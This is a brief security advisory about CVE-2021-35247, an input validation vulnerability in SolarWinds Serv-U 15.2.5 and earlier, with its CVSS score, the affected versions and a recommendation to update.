Issued: Monday, 24 January, 2022 |
Last Revision: Monday, 24 January, 2022 |
Vendor: |
Product: |
Severity Level: |
There is a new Serv-U vulnerability found by Microsoft, related to attacks being propagated via a previously undisclosed vulnerability in the SolarWinds Serv-U software. The vulnerability tracked as CVE2021-35247 is an input validation vulnerability that could allow attackers to build a query based on given input, and send it over the network without sanitation.
Serv-U, users can be authenticated against an internal LDAP server, such as a Windows domain controller or OpenLDAP serve.
As per SolarWinds,the attemps to login to Serv-U using the Log4j vulnerability failed, as Serv-U does not utilize Log4j code and the target for authentication LDAP (Microsoft Active Directory) is not susceptible to Log4J attacks.
CVE/Vulnerability | Description | CVSS3.0 Score |
CVE-2021-35247 | Input Validation Vulnerability | 5.3 |
Table 1: Vulnerability details
CVE/Vulnerability | Affected Product(s) |
CVE-2021-35247 | SolarWinds Serv-U 15.2.5 and previous versions |
Table 2: Vulnerable versions
We encourage Organizations to update the affected software to its latest version as soon as possible.